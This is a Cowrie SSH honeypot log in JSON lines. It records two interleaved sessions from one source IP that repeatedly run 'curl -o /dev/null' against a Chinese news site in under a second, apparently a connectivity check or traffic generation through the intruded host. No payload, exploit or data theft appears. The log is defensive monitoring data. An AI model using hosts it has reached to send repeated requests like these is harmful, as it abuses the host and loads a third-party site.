{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.333118Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.333518Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.345088Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.347756Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.349709Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.356447Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.357127Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.367774Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.368321Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.393697Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.394153Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.399305Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.403968Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.404524Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.423413Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.432937Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.433545Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.452454Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.453422Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.457875Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.472522Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.475202Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.487155Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.487776Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.491223Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.492254Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.495147Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.509495Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.533722Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.540593Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.541267Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.543486Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.544894Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.564183Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.573815Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.579459Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.580140Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.584349Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.585075Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.595371Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.599977Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.601642Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.617642Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.618566Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.621242Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.622258Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.626153Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.628328Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.639286Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.646059Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.648113Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.652489Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.658351Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.659338Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.663848Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.664705Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.669621Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.671283Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.687340Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.690414Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.694270Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.694924Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.702835Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.703532Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.714067Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.728759Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.729543Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.737655Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.743315Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.744845Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.745620Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.760258Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.767843Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.768581Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.784769Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.785475Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.801854Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:29:29.803731Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:29:29.804639Z","src_ip":"212.227.125.160","session":"7541ed730449"}
